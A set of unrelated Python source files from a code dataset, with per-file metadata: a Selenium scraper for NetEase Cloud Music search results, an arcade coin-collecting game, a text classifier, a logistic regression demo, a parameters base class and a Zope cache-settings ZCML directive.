selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom lxml import etree\nimport pymongo\nimport requests\nfrom wangyiyun.search_list.one_song_comment import song_comment\n\nclass Search():\n def __init__(self):\n self.browser = webdriver.Chrome()\n self.wait = WebDriverWait(self.browser, 10)\n self.client = pymongo.MongoClient('localhost', 27017)\n self.db = self.client['wangyiyun']\n self.comment = song_comment()\n self.base_url = 'https://music.163.com'\n self.url = 'https://music.163.com/#/search/m/?order=hot&cat=%E5%85%A8%E9%83%A8&limit=435&offset=435&s={}&type=1'\n\n def search(self):\n keys = input(\"Search Key:\")\n self.browser.get(self.url.format(quote(keys)))\n return self.browser\n\n def search_result(self):\n try:\n time.sleep(1.5)\n windows = self.browser.window_handles\n # 切换到当前最新打开的窗口\n self.browser.switch_to.window(windows[-1])\n f = self.wait.until(EC.presence_of_element_located((By.TAG_NAME, \"iframe\")))\n print(f)\n self.browser.switch_to.frame(f)\n time.sleep(1)\n doc = etree.HTML(self.browser.page_source)\n divs = doc.xpath(\"//div[@class='n-srchrst']/div[@class='srchsongst']/div\")\n for div in divs:\n link = self.base_url + div.xpath(\"./div[@class='td w0']//div[@class='text']/a/@href\")[0]\n self.comment.parse_comment(link)\n try:\n # if doc.xpath(\"//*[@class='zbtn znxt js-n-1548726589048 js-disabled']\"):\n # print(\"Page exhaustion ...\")\n # pass\n links = self.browser.find_elements_by_tag_name(\"a\")\n for link in links:\n if link.text == '下一页':\n link.click()\n return self.search_result()\n except StaleElementReferenceException:\n links = self.browser.find_elements_by_tag_name(\"a\")\n for link in links:\n if link.text == '下一页':\n link.click()\n return self.search_result()\n except Exception:\n print(\"Page exhaustion ...\")\n pass\n\n except Exception as e:\n print('Error',e.args)\n return self.search_result()\n\nif __name__ == '__main__':\n search = Search()\n search.search()\n search.search_result()\n\n", "sub_path": "search_list/search.py", "file_name": "search.py", "file_ext": "py", "file_size_in_byte": 2882, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 21, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 22, "usage_type": "call"}, {"api_name": "wangyiyun.search_list.one_song_comment.song_comment", "line_number": 24, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 35, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 39, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 43, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 43, "usage_type": 
"name"}, {"api_name": "selenium.common.exceptions.StaleElementReferenceException", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "522576482", "text": "import arcade\nimport random\n\nfrom Source.Unit.unit import Tower, Enemy\n\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nSPRITE_SCALING_COIN = 0.2\nSPRITE_SCALING_PLAYER = 0.6\nCOIN_COUNT = 30\nMOVEMENT_SPEED = 5\n\n\nclass MyGame(arcade.Window):\n \"\"\" Главный класс приложения. \"\"\"\n\n def __init__(self, width, height):\n super().__init__(width, height)\n\n arcade.set_background_color(arcade.color.AMAZON)\n self.all_sprites_list = None\n self.coin_list = None\n\n # Set up the player\n self.score = 0\n self.player_sprite = None\n self.physics_engine = None\n\n\n def get_coin(self, count: int, coin_list: list):\n for i in range(count):\n # Создать инстанс монеток\n # и их изображение из kenney.nl\n coin = arcade.Sprite(\"images/chicken.png\", SPRITE_SCALING_COIN)\n\n # Задать положение монеток\n coin.center_x = random.randrange(SCREEN_WIDTH)\n coin.center_y = random.randrange(SCREEN_HEIGHT)\n\n # Добавить монетку к списку \n coin_list.append(coin)\n\n def setup(self):\n # Настроить игру здесь\n self.player_list = arcade.SpriteList()\n self.coin_list = arcade.SpriteList()\n\n self.player_sprite = Tower(100, 10, 30, \"images/character/jedi.png\", SPRITE_SCALING_PLAYER)\n self.player_sprite.center_x = 50 # Стартовая позиция\n self.player_sprite.center_y = 50\n self.player_list.append(self.player_sprite)\n\n self.get_coin(COIN_COUNT, self.coin_list)\n\n def on_draw(self):\n \"\"\" Отрендерить этот экран. \"\"\"\n arcade.start_render()\n # Здесь код рисунка\n self.coin_list.draw()\n self.player_list.draw()\n\n output = f\"Score: {self.score}\"\n arcade.draw_text(output, 10, 20, arcade.color.WHITE, 14)\n\n def on_mouse_motion(self, x, y, dx, dy):\n \"\"\" Handle Mouse Motion \"\"\"\n\n # Move the center of the player sprite to match the mouse x, y\n self.player_sprite.center_x = x\n self.player_sprite.center_y = y\n\n\n def on_key_press(self, key, modifiers):\n \"\"\"Called whenever a key is pressed. \"\"\"\n\n if key == arcade.key.UP:\n self.player_sprite.change_y = MOVEMENT_SPEED\n elif key == arcade.key.DOWN:\n self.player_sprite.change_y = -MOVEMENT_SPEED\n elif key == arcade.key.LEFT:\n self.player_sprite.change_x = -MOVEMENT_SPEED\n elif key == arcade.key.RIGHT:\n self.player_sprite.change_x = MOVEMENT_SPEED\n\n def on_key_release(self, key, modifiers):\n \"\"\"Called when the user releases a key. 
\"\"\"\n\n if key == arcade.key.UP or key == arcade.key.DOWN:\n self.player_sprite.change_y = 0\n elif key == arcade.key.LEFT or key == arcade.key.RIGHT:\n self.player_sprite.change_x = 0\n\n def update(self, delta_time):\n \"\"\" Здесь вся игровая логика и логика перемещения.\"\"\"\n self.coin_list.update()\n coins_hit_list = arcade.check_for_collision_with_list(self.player_sprite, \n self.coin_list)\n # self.physics_engine.update()\n for coin in coins_hit_list:\n coin.kill()\n self.score += 1\n if len(self.coin_list) == 0:\n self.get_coin(COIN_COUNT * 2, self.coin_list)\n if self.score > 20:\n self.player_sprite.level_up('images/goat.png', 5)\n\n\ndef main():\n game = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT)\n game.setup()\n arcade.run()\n\n\nif __name__ == \"__main__\":\n main()", "sub_path": "game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 3764, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "arcade.Window", "line_number": 15, "usage_type": "attribute"}, {"api_name": "arcade.set_background_color", "line_number": 21, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 21, "usage_type": "attribute"}, {"api_name": "arcade.Sprite", "line_number": 35, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 38, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 39, "usage_type": "call"}, {"api_name": "arcade.SpriteList", "line_number": 46, "usage_type": "call"}, {"api_name": "arcade.SpriteList", "line_number": 47, "usage_type": "call"}, {"api_name": "Source.Unit.unit.Tower", "line_number": 49, "usage_type": "call"}, {"api_name": "arcade.start_render", "line_number": 58, "usage_type": "call"}, {"api_name": "arcade.draw_text", "line_number": 64, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 64, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 77, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 79, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 81, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 83, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 89, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 91, "usage_type": "attribute"}, {"api_name": "arcade.check_for_collision_with_list", "line_number": 97, "usage_type": "call"}, {"api_name": "arcade.run", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "560072494", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Created by Kristen on 1/3/16.\"\"\"\nimport webapp2\nclass MainPage(webapp2.RequestHandler):\n\tdef get(self):\n\t\tself.response.headers['Content-Type'] = 'text/plain'\n\t\tself.response.write('Hello world!')\n\napp = webapp2.WSGIApplication([('/', MainPage)], debug=True)\n", "sub_path": "appengine/helloworld.py", "file_name": "helloworld.py", "file_ext": "py", "file_size_in_byte": 308, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "webapp2.RequestHandler", "line_number": 5, "usage_type": "attribute"}, {"api_name": "webapp2.WSGIApplication", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "511488955", "text": "import numpy as np\n\nfrom sklearn.svm import LinearSVC\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\ndef get_train(stopword):\n\tdatas_train = []\n\ttargets_train = []\n\tfor i in range(1, 14, 1):\n\t\tfor line in 
open(\"/home/nhatnor123/Desktop/gitlabVC/classify_data/train/\" + str(i) + \".txt\", encoding=\"utf-8\"):\n\t\t\ttargets_train.append(i)\n\t\t\tdoc = []\n\t\t\tfor word in line.lower().split(\" \"):\n\t\t\t\tif (not word in stopword) and (not word.isdigit()):\n\t\t\t\t\tdoc.append(word)\n\t\t\tdatas_train.append(' '.join(doc))\n\ttargets_train = np.asarray(targets_train)\n\treturn datas_train, targets_train\n\n\ndef get_test(stopword):\n\tdatas_test = []\n\ttargets_test = []\n\n\tfor line in open(\"/home/nhatnor123/Desktop/gitlabVC/classify_data/test/data.txt\", encoding=\"utf-8\"):\n\t\tdoc = []\n\t\tfor word in line.lower().split(\" \"):\n\t\t\tif (not word in stopword) and (not word.isdigit()):\n\t\t\t\tdoc.append(word)\n\t\tdatas_test.append(' '.join(doc))\n\n\tfor line in open(\"/home/nhatnor123/Desktop/gitlabVC/classify_data/test/label.txt\", encoding=\"utf-8\"):\n\t\ttargets_test.append(int(line))\n\ttargets_test = np.asarray(targets_test)\n\treturn datas_test, targets_test\n\n\ndef svm_core(datas_train, targets_train, datas_test, targets_test):\n\tvectorizer = TfidfVectorizer(min_df=0.005, max_df=0.8)\n\tvectors_train = vectorizer.fit_transform(datas_train)\n\tvectors_test = vectorizer.transform(datas_test)\n\t\n\tscoreLSVC = LinearSVC(C=2.2).fit(vectors_train, targets_train).score(vectors_test, targets_test)\n\n\tprint(\"--------- classify_data ---------\")\n\tprint(\"Train : \", vectors_train.shape[0])\n\tprint(\"Test : \", vectors_test.shape[0])\n\n\tprint(\"----- SVM -----\")\n\tprint(\"ScoreLSVC :\", 100 * scoreLSVC, \"%\")\n\n\n#main\nstopword = open(\"/home/nhatnor123/Desktop/gitlabVC/Tuan 1/stopwords.txt\", encoding=\"utf-8\").read().split(\"\\n\")\ndata_train, target_train = get_train(stopword)\ndata_test, target_test = get_test(stopword)\nsvm_core(data_train, target_train, data_test, target_test)", "sub_path": "Tuan 1/NavieBayes/SVM.py", "file_name": "SVM.py", "file_ext": "py", "file_size_in_byte": 1945, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.asarray", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 39, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "243798543", "text": "\"\"\"\nTax-Calculator abstract base parameters class.\n\"\"\"\n# CODING-STYLE CHECKS:\n# pep8 parameters.py\n\nimport os\nimport json\nimport six\nimport abc\nimport ast\nimport collections as collect\nimport numpy as np\n\n\nclass ParametersBase(object):\n \"\"\"\n Inherit from this class for OG-USA parameter classes. 
Override this\n __init__ method and DEFAULTS_FILENAME.\n \"\"\"\n __metaclass__ = abc.ABCMeta\n\n DEFAULTS_FILENAME = None\n\n @classmethod\n def default_data(cls, metadata=False):\n \"\"\"\n Return parameter data read from the subclass's json file.\n\n Parameters\n ----------\n metadata: boolean\n\n start_year: int or None\n\n Returns\n -------\n params: dictionary of data\n \"\"\"\n params = cls._params_dict_from_json_file()\n # return different data from params dict depending on metadata value\n if metadata:\n return params\n else:\n return {name: data['value'] for name, data in params.items()}\n\n def __init__(self):\n pass\n\n def initialize(self, ):\n \"\"\"\n Called from subclass __init__ function.\n\n Added expand=True option to turn off expansion of arrays\n \"\"\"\n self.set_default_vals()\n\n def set_default_vals(self, known_years=999999):\n \"\"\"\n Called by initialize method and from some subclass methods.\n \"\"\"\n if hasattr(self, '_vals'):\n for name, data in self._vals.items():\n intg_val = data.get('integer_value', None)\n bool_val = data.get('boolean_value', None)\n values = data.get('value', None)\n if values:\n setattr(self, name,\n self._expand_array(values, intg_val, bool_val))\n\n # ----- begin private methods of ParametersBase class -----\n\n @classmethod\n def _params_dict_from_json_file(cls):\n \"\"\"\n Read DEFAULTS_FILENAME file and return complete dictionary.\n Parameters\n ----------\n nothing: void\n Returns\n -------\n params: dictionary\n containing complete contents of DEFAULTS_FILENAME file.\n \"\"\"\n if cls.DEFAULTS_FILENAME is None:\n msg = 'DEFAULTS_FILENAME must be overridden by inheriting class'\n raise NotImplementedError(msg)\n path = os.path.join(os.path.abspath(os.path.dirname(__file__)),\n cls.DEFAULTS_FILENAME)\n if os.path.exists(path):\n with open(path) as pfile:\n params_dict = json.load(pfile,\n object_pairs_hook=collect.OrderedDict)\n return params_dict\n\n def _update(self, mods):\n \"\"\"\n Private method used by public implement_reform and update_* methods\n in inheriting classes.\n Parameters\n ----------\n mods: dictionary containing a parameter:value pairs\n Raises\n ------\n ValueError:\n if mods is not a dict.\n Returns\n -------\n nothing: void\n Notes\n -----\n \"\"\"\n # check YEAR value in the single YEAR:MODS dictionary parameter\n if not isinstance(mods, dict):\n msg = 'mods is not a dictionary'\n raise ValueError(msg)\n all_names = set(mods.keys()) # no duplicate keys in a dict\n used_names = set() # set of used parameter names in MODS dict\n for name, values in mods.items():\n intg_val = self._vals[name].get('integer_value', None)\n bool_val = self._vals[name].get('boolean_value', None)\n # set post-reform values of parameter with name\n used_names.add(name)\n cval = getattr(self, name, None)\n nval = self._expand_array(values, intg_val, bool_val)\n cval[0] = nval\n # confirm that all names have been used\n assert len(used_names) == len(all_names)\n\n @staticmethod\n def _expand_array(x, x_int, x_bool):\n \"\"\"\n Private method called only within this abstract base class.\n Dispatch to either _expand_1D or _expand_2D given dimension of x.\n Parameters\n ----------\n x : value to expand\n x must be either a scalar list or a 1D numpy array, or\n x must be either a list of scalar lists or a 2D numpy array\n x_int : boolean\n True implies x has dtype=np.int8;\n False implies x has dtype=np.float64 or dtype=np.bool_\n x_bool : boolean\n True implies x has dtype=np.bool_;\n False implies x has dtype=np.float64 or 
dtype=np.int8\n Returns\n -------\n expanded numpy array with specified dtype\n \"\"\"\n assert not (x_int and x_bool)\n if not isinstance(x, list) and not isinstance(x, np.ndarray):\n msg = '_expand_array expects x to be a list or numpy array'\n raise ValueError(msg)\n if isinstance(x, list):\n if x_int:\n x = np.array(x, np.int8)\n elif x_bool:\n x = np.array(x, np.bool_)\n else:\n x = np.array(x, np.float64)\n return x\n\n OP_DICT = {\n '+': lambda pvalue, val: pvalue + val,\n '-': lambda pvalue, val: pvalue - val,\n '*': lambda pvalue, val: pvalue * val,\n '/': lambda pvalue, val: pvalue / val if val > 0 else 'ERROR: Cannot divide by zero',\n }\n\n def simple_eval(self, param_string):\n \"\"\"\n Parses `param_string` and returns result. `param_string can be either:\n 1. `param_name op scalar` -- this will be parsed into param, op, and scalar\n where `op` is a key in `OP_DICT`. The corresponding function is\n applied to the parameter value and the scalar value.\n 2. `param_name` -- simply return the parameter value that is retrieved\n from the object\n\n Parameters\n ----------\n param_string : string of form `param op scalar` or `param`\n\n Returns\n -------\n float used for validation\n \"\"\"\n pieces = param_string.split(' ')\n validate_against = pieces[0]\n # param_string is of the form 'param_name op scalar'\n if len(pieces) > 1:\n op = pieces[1]\n # parse string to python type (i.e. str --> int, float, bool)\n scalar = ast.literal_eval(pieces[2])\n value_against = getattr(self, validate_against)\n assert value_against is not None and isinstance(value_against, (int, float, np.ndarray))\n assert op in ParametersBase.OP_DICT\n return ParametersBase.OP_DICT[op](value_against, scalar)\n else:\n # vval is just the parameter name\n return getattr(self, param_string)\n", "sub_path": "pb_interface/parametersbase.py", "file_name": "parametersbase.py", "file_ext": "py", "file_size_in_byte": 6843, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "abc.ABCMeta", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 92, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 151, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 156, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.bool_", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 160, "usage_type": "attribute"}, {"api_name": "ast.literal_eval", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 195, "usage_type": "attribute"}]} +{"seq_id": "411046825", "text": "# -*- coding: utf-8 -*-\n# @Date : 2020/5/21\n# @Author: Luokun\n# @Email : olooook@outlook.com\n\nimport matplotlib.pyplot as plt\nimport 
numpy as np\n\n\nclass LogisticRegression:\n    \"\"\"\n    Logistic regression classifier\n    \"\"\"\n\n    def __init__(self, input_dim: int, lr: float):\n        self.weights = np.random.randn(input_dim + 1)  # randomly initialize the weights\n        self.lr = lr  # learning rate\n\n    def fit(self, X: np.ndarray, Y: np.ndarray):\n        x_pad = self._pad(X)  # pad X with ones for the bias term\n        pred = self._sigmoid(x_pad @ self.weights)  # compute predictions\n        grad = x_pad.T @ (pred - Y) / len(pred)  # compute the gradient\n        self.weights -= self.lr * grad  # update weights along the negative gradient\n\n    def __call__(self, X: np.ndarray):\n        x_pad = self._pad(X)  # pad X with ones for the bias term\n        pred = self._sigmoid(x_pad @ self.weights)  # compute predictions\n        return np.where(pred > 0.5, 1, 0)  # convert probabilities in (0, 1) to {0, 1} labels\n\n    @staticmethod\n    def _pad(x):\n        return np.concatenate([x, np.ones([len(x), 1])], axis=1)\n\n    @staticmethod\n    def _sigmoid(x):\n        return 1 / (1 + np.exp(-x))\n\n\ndef load_data():\n    x = np.stack([np.random.randn(500, 2) + np.array([1, -1]),\n                  np.random.randn(500, 2) + np.array([-1, 1])])\n    y = np.stack([np.full([500], 0), np.full([500], 1)])\n    return x, y\n\n\ndef train_logistic_regression(model, x, y, epochs, batch_size=32):\n    indices = np.arange(len(x))\n    for _ in range(epochs):\n        np.random.shuffle(indices)\n        for i in range(batch_size, len(x) + 1, batch_size):\n            model.fit(x[indices[(i - batch_size):i]], y[indices[(i - batch_size):i]])\n\n\nif __name__ == '__main__':\n    x, y = load_data()\n    plt.figure(figsize=[12, 6])\n    plt.subplot(1, 2, 1)\n    plt.title('Real')\n    plt.xlim(-5, 5)\n    plt.ylim(-5, 5)\n    plt.scatter(x[0, :, 0], x[0, :, 1], color='r', marker='.')\n    plt.scatter(x[1, :, 0], x[1, :, 1], color='g', marker='.')\n\n    x, y = x.reshape(-1, 2), y.flatten()\n    logistic_regression = LogisticRegression(2, lr=1e-3)\n    train_logistic_regression(logistic_regression, x, y, epochs=500)\n    pred = logistic_regression(x)\n    acc = np.sum(pred == y) / len(pred)\n    print(f'Accuracy = {100 * acc:.2f}%')\n\n    x0, x1 = x[pred == 0], x[pred == 1]\n    plt.subplot(1, 2, 2)\n    plt.title('Pred')\n    plt.xlim(-5, 5)\n    plt.ylim(-5, 5)\n    plt.scatter(x0[:, 0], x0[:, 1], color='r', marker='.')\n    plt.scatter(x1[:, 0], x1[:, 1], color='g', marker='.')\n\n    w = logistic_regression.weights\n    a, b = - w[0] / w[1], - w[2] / w[1]\n    line_x = np.linspace(-5, 5, 100)\n    line_y = a * line_x + b\n    plt.plot(line_x, line_y, color='b', linewidth=1)\n    plt.show()\n", "sub_path": "LogisticRegression/logistic_regression.py", "file_name": "logistic_regression.py", "file_ext": "py", "file_size_in_byte": 2732, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.random.randn", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 41, 
"usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 49, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "90228805", "text": "##############################################################################\n#\n# Copyright (c) 2006-2007 Lovely Systems and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). 
A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"\n$Id$\n\"\"\"\n__docformat__ = \"reStructuredText\"\n\nimport os\n\nfrom zope import interface\nfrom zope import component\nfrom zope import schema\n\nfrom zope.component import zcml\nfrom zope.component.zcml import handler\nfrom zope.proxy import removeAllProxies\nfrom zope.configuration.fields import GlobalObject\nfrom zope.publisher.interfaces.browser import IDefaultBrowserLayer\n\nfrom interfaces import IResponseCacheSettings\nfrom view import ResponseCacheSettings\n\nfrom zope.i18nmessageid import MessageFactory\n_ = MessageFactory('lovely.responseheader')\n\n\nclass ICacheSettingsDirective(interface.Interface):\n    \"\"\"Parameters for the cache settings directive.\"\"\"\n\n    for_ = GlobalObject(\n        title = _(u'for'),\n        description = _(u'The interface to register the settings for'),\n        required = True,\n        )\n\n    layer = GlobalObject(\n        title = _(u'Layer'),\n        description = _(u'The layer for which the settings should be used'),\n        required = False,\n        default=IDefaultBrowserLayer,\n        )\n\n    class_ = GlobalObject(\n        title = _(u'class'),\n        description = _(u'The class to use for the settings'),\n        required = False,\n        )\n\n    cacheName = schema.TextLine(\n        title = _(u'Cachename'),\n        required=False,\n        default=u'',\n        )\n\n    key = schema.BytesLine(\n        title = _(u'Cachekey'),\n        required = False,\n        )\n\n    lifetime = schema.TextLine(\n        title = _(u'Lifetime'),\n        description = _(u\"\"\"\n            The lifetime of the cache entry in seconds.\n            The content of this field will be evaluated.
It is possible to\n            give the value in the form '11*60*60'.\n            \"\"\"),\n        required = False,\n        default = None,\n        )\n\n    dependOnContext = schema.Bool(\n        title = _(u'Depend On Context'),\n        description = _(\"\"\"\n            The dependency will always contain the context of the view.\n            \"\"\"),\n        required = False,\n        default = False,\n        )\n\n\nclass FactoryCacheSettings(ResponseCacheSettings):\n\n    def __init__(self, context, request):\n        super(FactoryCacheSettings, self).__init__(context, request)\n        self.dependOnContext = False\n\n    @property\n    def dependencies(self):\n        if self.dependOnContext:\n            view = removeAllProxies(self.context)\n            return [removeAllProxies(view.context)]\n        return []\n\n\nclass CacheSettingsFactory(object):\n\n    def __init__(self,\n                 cacheName, key, lifetime, dependOnContext):\n        self.cacheName = cacheName\n        self.key = key\n        self.lifetime = lifetime\n        self.dependOnContext = dependOnContext\n\n    def __call__(self, context, request):\n        settings = FactoryCacheSettings(context, request)\n        if self.cacheName is not None:\n            settings.cacheName = self.cacheName\n        if self.key is not None:\n            settings.key = self.key\n        if self.lifetime is not None:\n            settings.lifetime = self.lifetime\n        settings.dependOnContext = self.dependOnContext\n        return settings\n\n\ndef cacheSettingsDirective(_context,\n                           for_,\n                           layer=IDefaultBrowserLayer,\n                           class_=None,\n                           cacheName=None,\n                           key=None,\n                           lifetime=None,\n                           dependOnContext=False,\n                           ):\n    if class_:\n        cdict = {}\n        if lifetime is not None:\n            cdict['lifetime'] = eval(lifetime)\n        if cacheName is not None:\n            cdict['cacheName'] = cacheName\n        if key is not None:\n            cdict['key'] = key\n        if dependOnContext is not None:\n            cdict['dependOnContext'] = dependOnContext\n        new_class = type(class_.__name__, (class_,), cdict)\n    else:\n        if lifetime is not None:\n            lifetime=eval(lifetime)\n        new_class = CacheSettingsFactory(\n            cacheName, key, lifetime, dependOnContext)\n    _context.action(\n        discriminator = (\n            'cacheSettings',\n            layer,\n            for_,\n            ),\n        callable = handler,\n        args = ('registerAdapter',\n                new_class,\n                (for_, layer),\n                IResponseCacheSettings,\n                '',\n                _context.info),\n        )\n\n", "sub_path": "lovely.responsecache/tags/0.2.4/src/lovely/responsecache/zcml.py", "file_name": "zcml.py", "file_ext": "py", "file_size_in_byte": 5171, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "zope.i18nmessageid.MessageFactory", "line_number": 35, "usage_type": "call"}, {"api_name": "zope.interface.Interface", "line_number": 38, "usage_type": "attribute"}, {"api_name": "zope.interface", "line_number": 38, "usage_type": "name"}, {"api_name": "zope.configuration.fields.GlobalObject", "line_number": 41, "usage_type": "call"}, {"api_name": "zope.configuration.fields.GlobalObject", "line_number": 47, "usage_type": "call"}, {"api_name": "zope.publisher.interfaces.browser.IDefaultBrowserLayer", "line_number": 51, "usage_type": "name"}, {"api_name": "zope.configuration.fields.GlobalObject", "line_number": 54, 